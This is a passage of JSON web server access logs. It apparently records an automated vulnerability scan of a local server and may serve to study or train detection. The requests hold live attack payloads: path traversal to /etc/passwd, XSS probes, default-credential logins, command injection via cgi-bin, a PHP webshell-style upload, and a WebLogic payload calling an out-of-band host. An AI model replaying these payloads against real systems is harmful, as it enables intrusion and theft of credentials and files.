+0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"_charset_=utf-8&j_username=author&j_password=author&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/english/index.html?javascript& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php/'%3E%3Csvg/onload=alert%6029N5Eib1hm0gSfaa0jZSomILK8W%60%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /-/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jquery-file-upload/server/php/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://ca2tuc8smpv1g2s80ca0znc861j944xcb.oast.pro') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"_charset_=utf-8&j_username=anonymous&j_password=anonymous&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webstats/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.composer/composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///////../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dwr/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22reqid\x22\x0D\x0A\x0D\x0A17457a1fe6959\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22cmd\x22\x0D\x0A\x0D\x0Aupload\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22target\x22\x0D\x0A\x0D\x0Al1_Lw\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22mtime[]\x22\x0D\x0A\x0D\x0A1576045135\x0D\x0A--------------------------ca81ac1fececda48\x0D\x0AContent-Disposition: form-data; name=\x22upload[]\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0Apoc-test\x0D\x0A--------------------------ca81ac1fececda48--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"\x0D\x0A\x0D\x0A&e1;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owncloud/config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"_charset_=utf-8&j_username=jdoe@geometrixx.info&j_password=jdoe&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static///////../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/composer/installed.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/logout?continue=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aworkreap_award_temp_file_uploader\x0D\x0A-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22award_img\x22; filename=\x2229N5Eh8LkzLJz0Nmr9lde3DDnsb.php\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------cd0dc6bdc00b1cf9--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/cgi-bin/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemstatus.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", 